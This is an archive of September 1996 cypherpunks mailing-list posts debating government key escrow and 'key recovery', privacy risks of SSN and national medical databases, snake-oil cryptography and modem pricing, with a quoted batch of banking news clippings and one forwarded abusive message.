From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 19 Sep 1996 01:56:40 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <Pine.3.89.9609180033.A7300-0100000@netcom22>
Message-ID: <199609181448.JAA01172@homeport.org>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:

| On Wed, 18 Sep 1996, Steve Schear wrote:
| > It seems that in order for this to work Net consumers must be
| > convinced/coerced into accepting the GAK security features.  What if, due
| > to a grassroots uprising, Neters refuse to use products which require GAK
| > or Net services which will only operate via GAK?  Isn't there an great
| > opportunity being created for S/Wan, Apache and its ilk and third-party
| > (especially off-shore, non-COCOM, produced) security plug-ins?
| 
| Simple. Incentivize sites/server/payment system manufacturers to require 
| certs from their users. This is already underway. See SET. Then make sure 
| that the certs/keys are GAK'ed. Yes, I know there is a difference between 
| certs and keys. Joe User doesn't. Neither does the media. It is a two step 
| process.

	The problem with GAK in financial systems is that it makes
your non-repudiation repudiable.  It also opens you to the CIA using
your bank to finance a revolution in Central America.  Think of it as
a revolutionary tax. ;)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Thu, 19 Sep 1996 05:46:52 +0800
To: cypherpunks@toad.com
Subject: Re: SSN database scam?
Message-ID: <2.2.32.19960918141242.006e9b48@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 9/18/96 +0200, Gary Howland <gary@systemics.com> forwarded:
>Forwarded from www-security mailing list.
[snip]

>Can anybody comment on the item forwarded below my sig file? It claims
>there's a database w/ people's credit card no's etc on it and you have to
>give your name and social security number to get off of it.  This strikes
>me as being a scam to get your ssn, but this went around at work and
>people are actually calling and giving it out.  I know ssn's aren't really
>as secure as they're supposed to be, but  still...

I happen to work for Lexis-Nexis, but I don't speak for the company.  Yes,
P-Trak is real, it was recently made available to our customers.

It is NOT a scam to get SSNs.  Lexis-Nexis is a large and reputable company,
best-known for its huge legal database system, Lexis.  The Nexis side has
news reports from a large variety of sources.

P-Trak originally made SSNs available, but Lexis-Nexis removed this feature
in response to protests.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: f_estema@alcor.concordia.ca
Date: Thu, 19 Sep 1996 05:03:05 +0800
To: Benjamin Grosman <bgrosman@healey.com.au>
Subject: [joke, non-code] Re: Get this for a snake-oil example :)
In-Reply-To: <2.2.32.19960918083303.00750b3c@healey.com.au>
Message-ID: <Pine.OSF.3.91.960918100655.20016A-100000@alcor.concordia.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Sep 1996, Benjamin Grosman wrote on coderpunks:

> Hey there...thought I'd drop this in to you...
> someone I know is in the process of being set upon by a shamster (well,
                                                          ^^^^^^^^

Shamster: SHA-enabled biocomputing hamster. Distantly related to Shneier's
DESosaurus. Cute, cuddly and mathematically secure and authentic. I leave
to the imagination its input and output processes. Eats snake oil for 
lunch.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip Mefford <cmefford@avwashington.com>
Date: Thu, 19 Sep 1996 03:10:23 +0800
To: cypherpunks@toad.com
Subject: cypherpunk listserve usefulness
Message-ID: <v03007801ae65b79e711a@[207.79.65.35]>
MIME-Version: 1.0
Content-Type: text/plain



As much as it shames me, I have recently discovered that by filtering
messages from only 2 participants and setting body filters on 3 keywords
have remarkably improved the usefulness of this listserve.

As much as I do enjoy some of the filtered subject matter, I really feel it
is very off subject and makes this listserver useless for the intended task.

I guess that makes me a censor and it has me reexamining some things.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 19 Sep 1996 05:02:23 +0800
To: snow <snow@smoke.suba.com>
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <9608188430.AA843068299@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> wrote:
> Actually, don't some wealthy Canucks come south of the border for
> certain treatments unavailable in the Great White North? 
 
Yes, some wealthy (and not so wealthy people) go south of the border for
treatment. Some go because the treatment is unavailable here, others go if they
chose not to wait for treatment here. The most common types of exported services
are usually high cost and/or experimental but their availability is most often
constrained by the low number of people who are qualified to render the service.
Many services unavailable in a patient's local area are still covered by
provincial health plans. This works when a patient has to travel from a remote
region, to another province or to the U.S., and can cover experimental
treatments.
 
Some Canadian hospitals make use of U.S. care providers for services when a
backlog exists in Canada. For example, Windsor has used Detroit MRI services to
reduce waiting times.

There are also people who go the other way (U.S. to Canada), usually when they
have to pay their own bill. Detroit to Windsor is again not uncommon.
 
> Are the PRICES as high in Canada as here?
 
In general, prices are lower in Canada for the same level of care. I do not know
if the underlying costs are also lower in general.
 
Each province create a payment schedule for services that it reimburses.
Hospitals bill the province for services, but all capital cost items (e.g.
equipment, buildings) must be paid for from other sources (e.g. donation). Thus,
we tend to have fewer capital intensive treatment facilities since the ROI is
usually low.
 
The figures that I have seen indicate that the U.S. pays 40%-50% more than
Canada on overall health care services. Some of this is due to the rapid
availability of higher cost/experimental services. Some of this is due to the
higher cost of the administrative bureacracy. Due to the large difference in
total costs, I do not think that travel in either direction significantly
effects this number.
 
Ciao,
James
 
Check out www.spinex.com for more effective alternatives to MRI for diagnosing
spinal function at 1/20th of the cost. 
 
P.S. No, Canada is not perfect, and I don't know everything.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 07:53:28 +0800
To: cypherpunks@toad.com
Subject: GAK, GAP, GAY
Message-ID: <ae657f56110210042afc@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



GAK -- Government Access to Keys

GAP -- Government Access to Patients

GAY -- Government Access to You


At 3:03 PM 9/18/96, Lucky Green wrote:
>On Wed, 18 Sep 1996, Jim Ray wrote:
>> I agree, and hope so. "Key Recovery," while not as Orwellian-sounding as
>> "GAK," is a step on the path to honesty WRT the English language, though
>> it's important to continually point out, as Tim did in his post, that
>> *access* -- rather than just recovery -- is obviously what Mr. Freeh wants.
>>
>> I'd count this likely change in terminology as a "cypherpunk victory,"
>> albeit a very small and certainly a very hard-fought one.
>
>Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK
>now fully obfuscates the distinction between accessing a
>backup copy by the legitimate owner (or his estate, employer, etc.) and
>GAK. Many PKIs will support the former type of key recovery. And for good
>reasons. Thanks to the brainwashers using the same term for GAK, it will
>now become impossible to tell from a basic description of a PKI if it
>supports GAK or not. Furthermore, those who oppose the latter type of key

Further, merely _asking_ your Designated Key Recovery Authority what its
release policies are will of course place your name on the SPL (Suspicious
Persons List). The FAA is an agency which will have nearly unlimited access
to communications, under the Safe Skies and Anti-Child-Hurting Act.

(Think about it--Clinton already signed a couple of Presidential Decision
Directives and Congress passed various anti-terrorism acts which already
give the Feds authority to wiretap and surveil more widely than before, at
least legally. The Foreign Intelligence Surveillance Act (or court) allows
widespread surveillance of suspected foreign agents, without any
notification of local courts or of the surveillance target. Won't these
many provisions allowing wide surveillance already be used almost
instantaneously to force PKIs to disclose keys of all those on the SPL? "If
it saves just one child.")

On a related note, I read an article yesterday about the proposed new
Health Data Base, with all encounters with any medical institution or any
health care provider of any sort being cross-linked and cross-referenced.
The privacy concerns are supposedly handled by having "security tickets"
for various hospital officials, researchers (!!), insurance companies, and
law enforcement. (I put the "!!" next to the "researchers" because I don't
recall releasing my medical and dietary history to any so-called
"researchers." While I have no doubt that many "data miners" would like
access to such national data bases, and that some potentially valuable
information could be gleaned, I didn't release this information for Joe
Gradstudent, Ph.D. candidate to sift through.)

[Here are some more details: "Mission: one-stop medical records," Robert S.
Boyd, San Jose Mercury News, 1996-09-17, p. 1. "Virtually unnoticed by the
public, health-care experts are preparing to create an electronic "Master
Patient Index," covering every American's medical records from cradle to
grave...."We can't eliminate privacy concerns, but we can minimize them,"
said Richard Rubin, president of the Foundation for Health Care Quality in
Seattle at a planning conference here last week....David Kilman, a computer
expert at New Mexico's Los Alamos National Laboratory, where the idea for
the master index was born....Only people with a 'security ticket'--such as
doctors, insurers, scientific researchers or police with a proper
warrant--are supposed to be able to see the clinical details....Kathy Ganz,
director of the New Mexico Health Policy Commission, said, "Rights to
privacy are genuine concerns, but they will need to be balanced against
notions of common good.""]

Pretty chilling, eh? As we all know, once such medical, dietary, and
genetic data bases are established, the likelihood of privacy-invading use
is near unity. If the NLETS data base can be routinely accessed (it's how I
got Thomas Pynchon's home address, but that's another story), imagine who
will hack this data base! The tabloids will love it, as they gain access to
"medical records of the stars." Hackers will suck down as much as they can
and then sell the records.

And such data bases will be tied to True Names, of course, thus allowing
the "freezing out" of anyone who is not a True Name, who has fallen behind
in child support payments, who is late on his income taxes, and so on.

It doesn't matter if cash is still allowed if one cannot interact with any
health care person without a proper citizen-unit data base entry. They've
got you tracked even if you pay in gold dust.

(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what
will happen the first time someone dies because a hospital wouldn't treat
someone without a proper citizen-unit health care card?)

P.S. I fully understand that some doctors will treat patients for cash,
without reporting to The Authorities, just as some doctors will treat
gunshot wounds without the mandatory reporting of same to the police. This
does not mean such doctors will be easy to find. The System, if allowed to
win, will win.

P.P.S. Many of the things we talk about on the list are being made
possible--the good and the bad--by computerization. Obviously. Burnham's
"Age of Privacy" (or maybe it was "The Age of Surveillance"--my copy is not
handy) made this point many years ago. We are taking the mechanization and
systematization procedures the Germans used so efficiently in the 1930s and
modernizing them, with every movement and every transactions tracked and
recorded in data bases. Now more than ever we need "credentials without
identity" and digital cash. Chaum's article about "Transaction Systems to
Make Big Brother Obsolete" is now more urgent than ever.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Thu, 19 Sep 1996 04:59:13 +0800
To: krenn@nym.alias.net (Krenn)
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu>
Message-ID: <199609181500.LAA08399@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Krenn wrote:
: 
: It would be nice to have a list of actual products which are deemed
: potential snake-oil. Such a list could be maintained anonymously
: through a nym to avoid all the annoying legal problems with commenting
: on another's product. Though truth is the best defense against libel
: charges, it would be very annoying to be sued or some such by some
: hairbrained snake-oil peddler.
: 

I think a blacklist of that sort is inherently bad.  I would much rather
have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than
just be spoon fed a list of good products vs. bad products.  Pardon the
cliche, but if you give a man a fish ... etc, etc.

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkAOhBz4pZwIaHjdAQEe9wf8D2Dhp1vcv1W4aOiugeNrJTp7FoDIb3yo
62sq44c/vlBX/Ph6InrHP6zHIKG1gx6ipt1NLXGWDZV0hWGrn9Eu7dIATqHjoyoM
9oFK8c00Rlg63o/FVl2XUHovfbPolqOBX24MRngqrsyWdOyqdShSwVPTH5ZBUj5I
Pxp4BWjcjYqkfF7nKXaWitJs2wjaM4yYQ57UIe1Hm/SLLL2erxNfrveWN1VwrdyO
N3QIuHfPWM3yi+UUJTOybOKLp+j07bgs+mLr2MT9JmYYrYZwtTEwLD4a6oueUZpN
LLWaIS8vekEy7HSzhG7sPfo35v/aaKKWs739af3UgLd3HUdzmVvfgw==
=YK3C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Sep 1996 04:23:03 +0800
To: hallam@ai.mit.edu
Subject: Re: Spam blacklist project
Message-ID: <3.0b19.32.19960918112541.00a0bc48@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@ai.mit.edu writes:

> Well if some people find it amazing that there are people out there
> who agree with the 98.8% of people who did not vote Libertarian at the
> last election then so be it.

Course half the eligible population didn't vote at all obviously favoring
market and personal approaches over political methods of governance.  

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Thu, 19 Sep 1996 07:47:27 +0800
To: liberty@gate.net
Subject: Re: The GAK Momentum is Building...
Message-ID: <199609181600.MAA109012@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: shamrock@netcom.com, liberty@gate.net, cypherpunks@toad.com
Date: Wed Sep 18 11:57:32 1996
Lucky wrote: 

> On Wed, 18 Sep 1996, Jim Ray wrote:

[my stuff about a small "victory" elided.]

> Nope. It is a Cypherpunk loss. The use of the term "key recovery" for GAK
> now fully obfuscates the distinction between accessing a 
> backup copy by the legitimate owner (or his estate, employer, etc.) and 
> GAK. Many PKIs will support the former type of key recovery. And for good
> reasons. Thanks to the brainwashers using the same term for GAK, it will
> now become impossible to tell from a basic description of a PKI if it 
> supports GAK or not. Furthermore, those who oppose the latter type of key
> recovery (us!), will be pushed further into the fringe by the media 
> now being able to mix up our arguments against GAK with arguing against 
> true key recovery. [Do you notice the weird constructs I have to use to 
> distinguish the two meanings? One of them being new...]

Upon further reflection, I agree with Lucky. I will say that the _really_ 
bad news is that our opponents seem to be getting smarter. <sigh> Or else 
I'm just getting dumber. :(

Also: If any more of you have comments for Judge Kozinski, please send them 
to me soon. Comments from stable nyms (such as you, Lucky) are especially 
appreciated, and with your permission I will include this message. Please 
tell me if you want me to include your e-mail address in the message to 
Judge Kozinski. TIA.
JMR


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMkAb8m1lp8bpvW01AQGwDQP/Wz8Bw27oXVzNt4gusljym5ardHFgCNDR
A3N8kXcL7rGRs2SFDBNYlodcTSh60d1FJTvLQ77oolMPWp3oQygZ+HLFEhwHK/GG
tt1VPavPhvpdPiXoDOcZKUm/vRobAJrvkfUEaeqI8hmzCVBq5YS/4m4KaD3XquWO
w0IyCViMVmw=
=ntqD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:10:48 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
In-Reply-To: <199609181248.IAA06860@sherry.ny.ubs.com>
Message-ID: <B0kguD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


pjb@ny.ubs.com writes:

> if nothing else, the availability of 56kbps on an analog line might get the
> telcos to bring the isdn prices down to some reasonable level, which at the m
> it is not, at least not in nyc.

In NYC one has to pay 1c/minute/channel for using ISDN, even for a local call,
which comes out to $1.20/minute for the 2 channels most people have.
It worse than most Western states, with no per minute charges.
It's better than Connecticut, where it costs $6/hour.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:18:20 +0800
To: cypherpunks@toad.com
Subject: Re: Fuckhead
In-Reply-To: <199609181408.AA21359@crl11.crl.com>
Message-ID: <NgLguD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From varange@crl.com  Wed Sep 18 10:09:35 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 11:07:01 EDT
	for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA17484 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230
  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:02 -0700
Received: by crl11.crl.com id AA21359
  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700
From: Troy Varange <varange@crl.com>
Message-Id: <199609181408.AA21359@crl11.crl.com>
Subject: Fuckhead
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT)
Priority: Fuckhead
Precedence: Fuckhead
Reply-To: dlv@bwalk.dm.com
In-Reply-To: <Fuckhead>
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 10        

Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 11:38:21 +0800
To: cypherpunks@toad.com
Subject: Re: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <199609181401.AA21244@crl11.crl.com>
Message-ID: <5gLguD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From varange@crl.com  Wed Sep 18 10:09:46 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 11:07:02 EDT
	for dlv
Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA17510 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400
Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347
  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:14 -0700
Received: by crl11.crl.com id AA21244
  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700
From: Troy Varange <varange@crl.com>
Message-Id: <199609181401.AA21244@crl11.crl.com>
Subject: Re: [NEWS] Crypto-relevant wire clippings
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT)
In-Reply-To: <3kJFuD96w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 19290     

> 
> Money Laundering Alert: August 1996
> 
> 'Unauthorized' Banks Pose Laundering Threat
> 
> They are subject to none of the recordkeeping or reporting requirements
> of the Bank Secrecy Act, receive no examinations from any banking
> regulator, and may be on your bank's currency transaction reporting
> exemption list.
> 
> The Office of the Comptroller of the Currency refers to them as
> "entities that may be conducting banking operations in the U.S. without
> a license." Money launderers probably refer to them as dreams come true
> and, unless legitimate financial institutions are alert, can use them to
> place illicit proceeds into the financial system.
> 
> They are "unauthorized" banks, and for the past five years the OCC has
> been disseminating advisories to legitimate U.S. banks - but not to
> consumers - in an effort to expose their existence and halt their
> illegal operations.
> 
> These so-called "banks" offer a variety of banking services, often at
> lower fees and better interest rates than legitimate banks offer. What
> makes them different from a legitimate bank - and attractive to money
> launderers -- is that they are not licensed by any U.S. banking agency
> and thus do not have to meet regulatory standards.
> 
> Because the OCC and other federal bank regulators are not investigative
> agencies, they can do little more than report these institutions to
> those who are. If the entities are found to be operating a bank without
> a license they can be prosecuted under the Glass-Steagell Act (Title 12,
> USC Sec. 378(a)(2)).
> 
> Such prosecutions are rare. In one case in 1994, initiated by Federal
> Reserve Board examiners, the principals of Lombard Bank, Ltd., were
> charged with operating an unauthorized bank through a payable-through
> account at American Express Bank International in Miami. Lombard, which
> had been "licensed" in the South Pacific money laundering haven of
> Vanuatu, offered its Central American customers virtually full banking
> services in the U.S. through its PTA (MLA, Sep. 1994).
> 
> Earlier this year, the OCC released a list of more than 50 "banks" known
> to be operating without authorization. OCC officials say the number
> grows steadily. Some of the "banks" say they are licensed by foreign
> countries or U.S. states to conduct banking business. Others, such as
> the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer
> services in the U.S. despite edicts from foreign banking authorities to
> cease doing business.
> 
> The unauthorized entities have a common trait. They usually have names
> that are similar to those of well-known legitimate institutions. The OCC
> list includes the Bank of England, a Washington, D.C., entity not
> associated with London's famous "old lady on Threadneedle Street" and
> Citicorp Financial Services, a Beverly Hills firm not associated with
> the better-known institution of that name. It also includes the First
> Bank of Internet, which heralds itself as the first bank in cyberspace.
> 
> Through its periodic "special alerts," the OCC warns banks to "view with
> extreme caution any proposed transaction involving any of the listed
> entities." It makes no effort to educate members of the general public
> who unknowingly place their money and trust in those uninsured
> institutions.
> 
> 
> 
> 
> American Banker: Friday, August 30, 1996
> 
> Swift Near Alliance in Trade Document Automation
> 
> By STEVEN MARJANOVIC
> 
> Swift, the international banking telecommunications network, wants to
> play a bigger role in trade finance and the exchange of related
> documentation.
> 
> Sources said the Brussels-based organization will soon take a position--
> perhaps as early as its September board meeting-- on whether to work on
> trade automation in cooperation with another consortium, called Bolero.
> 
> Such a move would involve an increase in nonbank participants on a
> bank-owned network that has approached such liberalization cautiously.
> 
> Swift, formally the Society for Worldwide Interbank Financial
> Telecommunication, is used by 5,300 banks for exchanging messages in
> such areas as funds transfer, foreign exchange, and securities.
> 
> The network averaged about 2.7 million messages a day in July,
> representing daily dollar volumes exceeding $2 trillion.
> 
> Officials said Swift is nearing a decision to work with the Bolero
> Association, which is forming an electronic registry for the so-called
> "dematerializing" of trade documents. Swift could provide the "platform"
> for allowing banks and corporations to exchange such documentation as
> letters of credit and bills of lading.
> 
> Bolero was formed in 1994 with funding from the European Commission, but
> has not formulated concrete operating plans. Its members include
> Citicorp, Barclays Bank PLC, and other multinational banks and
> corporations.
> 
> Peter Scott, trade services market director at Swift, said it has been
> in discussions with London-based Bolero since December 1995 about
> joining forces to automate the exchange of trade documents.
> 
> "Bankers are beginning to sense both the opportunities in those areas
> and the threats to them from an intermediary stepping in and potentially
> taking away the business," Mr. Scott said.
> 
> Trade-document capability "is not a heavily utilized area within Swift
> at the present time," he said.
> 
> The potential in automation is obvious to Bolero officials. At the New
> York Banktrade Conference recently, John McKessy, the association's
> North American representative, said the annual value of goods moved
> internationally approaches $4 trillion.
> 
> He estimated current international trade requires some three billion
> documents to be issued and managed.
> 
> The cost of dealing with paper alone eats up about 7% of the total value
> of those goods, as much as $280 billion, Mr. McKessy said.
> 
> Bank revenues from issuing letters of credit last year were just over $1
> billion, according to a soon-to-be-released survey by the U.S. Council
> on International Banking.
> 
> Anthony K. Brown, senior vice president of trade services at MTB Bank,
> described trade transaction processing as "extremely cumbersome and
> tedious, prone to mistakes and delays (that) can be a hindrance to the
> completion of a transaction."
> 
> MTB is a $400 million-asset merchant bank based in New York. About 80%
> of its $100 million in loans are trade-related.
> 
> The paper-shuffling costs are not borne entirely by banks. Import/export
> companies, insurers, freight forwarders, and various government
> inspection agencies are also involved.
> 
> "The question is whether Swift wants to do it," said Dan Taylor,
> president of the New York-based U.S. Council.
> 
> "Swift is going to act fairly quickly on this," he added.
> 
> Mr. Taylor said Swift officials will likely grapple once again with the
> political and philosophical issues of giving nonbanks more access to
> Swift, and to payment systems generally.
> 
> In 1995, the network granted partial access to nonbanks after years of
> heated debate.
> 
> "You always have this push and pull, where some banks would like Swift
> to do certain things" while others want the network to focus on the
> money transfer business, Mr. Taylor said.
> 
> "If Bolero succeeds and Swift joins, I think it will move fairly
> rapidly, but I'm not sure that Bolero is going to be the only thing out
> there."
> 
> He said Bolero might evolve using value-added networks - or intranets -
> like the IBM Global Network and General Electric Information Services
> Co., or perhaps even the Internet.
> 
> Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is
> apparently talking to several providers of private, value-added networks
> and may soon enter a contract with one.
> 
> CSI letter-of-credit software leads the pack in banking, with about a
> 16% market share, Mr. Taylor said.
> 
> The company recently formed a business unit called Electronic Documents
> International, which has developed an Internet-based system for
> initiating letters of credit. CSI spokesman George Capsis said the
> software, Import.com, creates "about 30 key documents involved in
> international trade."
> 
> The Internet, enhanced with security features, may help the trade
> industry reduce paper-related costs, especially at smaller companies
> overseas.
> 
> CSI managing director Andre Cardinale said customers need only to "dial
> into a bank's Internet server, pull up the Import.com application, and
> actually fill in the details to create a new letter of credit or an
> amendment to an existing one."
> 
> While Bolero may find a place on the Internet or a GE-type network, Mr.
> Cardinale said the ultimate push may yet come from the banking industry
> working collectively through Swift.
> 
> He said Swift opposition from nonbank constituencies that are concerned
> the telecommunications cooperative will be more sympathetic to banks
> when disputes arise.
> 
> But "if Swift does it," he added, "it will bring banks into the universe
> far more - pardon the pun - swiftly."
> 
> 
> Crain's New York Business: August 26, 1996
> 
> Bloomberg to Detail Growth of Information Empire
> 
> Michael Bloomberg made a name for himself on Wall Street with his
> trading acumen and mastery of the computer systems that were becoming
> crucial to success in the securities business.
> 
> But no one suspected when he left Salomon Brothers in 1981 that in the
> next decade he would build the fastest-growing provider of financial
> information in the world.
> 
> Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated
> sales of $600 million, will be the keynote speaker at the fifth annual
> Crain's ''Growing a Business Expo,'' to be held this year on Thursday,
> Oct. 24.
> 
> The event will take place at the New York Hilton & Towers from 8 a.m. to
> 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and
> Empire Blue Cross and Blue Shield.
> 
> Last year, more than 1,000 growing business owners and managers attended
> the expo, which provides information for companies operating in the city
> regarding potential suppliers, financial resources and government
> programs.
> 
> The cost to attend the event is $45 and includes a continental
> breakfast. Individuals registering before Sept. 6 can bring a colleague
> for free. To register, call Flagg Management at (212) 286-0333.
> 
> In addition to Mr. Bloomberg's speech, attendees will be able to attend
> seminars on financing and other help available from the city, financing
> techniques, energy cost savings programs and how to reduce health
> insurance costs. An expected 135 exhibitors will be offering products
> and services of use to growing companies.
> 
> Crain's New York Business editors will discuss how a growing business
> can get coverage in Crain's and in other publications.
> 
> The heart of Mr. Bloomberg's empire is a news gathering operation that
> sends information through 62,000 computer terminals installed on the
> desks of investment professionals around the nation. His company
> provides the latest financial news and sophisticated tools to analyze
> information.
> 
> The company he has built is noted for its lack of bureaucracy despite
> its growth to 2,000 employees. Its hallmarks are hands-on leadership and
> an entrepreneurial atmosphere where employees receive perks such as free
> food.
> 
> Mr. Bloomberg has extended his reach to include an all-news radio
> station in New York, WBBR; Bloomberg Personal TV; syndicated television
> shows; a monthly personal finance magazine; and a similar magazine for
> institutional investors.
> 
> 
> American Banker: Friday, September 6, 1996
> 
> America Online Opens a New Banking Channel
> 
> By DREW CLARK
> 
> Nineteen banks - national home banking stalwarts such as Citicorp and
> BankAmerica, plus a complement of less prominent regionals - have
> climbed onto the America Online bandwagon.
> 
> Most already offer their customers several options for banking via
> personal computer and view America Online, with its six million
> subscribers, as a way to appeal to a broad cross-section of computer-
> literate consumers.
> 
> Fourteen of the AOL banking partners will be delivering services through
> BankNow, a software package developed for the interactive network by
> Intuit Inc.
> 
> The other five banks have opted to use their own software. One of them -
> Security First Network Bank, which operates entirely on the Internet -
> will invite AOL users in through their Web browsers.
> 
> With its announcement this week, America Online Inc. takes its place
> among the many alternative "channels" for on-line banking.
> 
> Many of the banks on AOL's list are simultaneously cooperating with
> other companies that are themselves competitors, such as Intuit and
> Microsoft Corp., suppliers of the Quicken and Money financial management
> software, respectively.
> 
> Also crossing competitive lines, America Online said its subscribers
> will be able to bank from home with PC software from three suppliers
> other than Intuit: Checkfree Corp., Online Resources and Communications
> Corp., and Visa Interactive.
> 
> "Everyone understands that there is competition in the home banking
> arena," said David Baird, general manager of the personal finance
> division at America Online, based in Dulles, Va. "To align ourselves
> with exclusively one company would be a mistake."
> 
> Intuit can count on 14 initial bank users of BankNow. Spokesmen for the
> other three system vendors declined to say when they expect to have home
> banking products available for the AOL channel.
> 
> Experts noted that AOL and Intuit could be a strong tandem, in that they
> dominate their respective businesses.
> 
> Intuit's Quicken is the leading brand in personal finance software. The
> company claims more than 9 million active users and a market share of
> about 80%.
> 
> America Online's subscriber base of six million is as big as those of
> its next two competitors, Compuserve and Prodigy, combined.
> 
> The financial institutions currently offering BankNow are: American
> Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of
> Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama,
> CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD
> Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York,
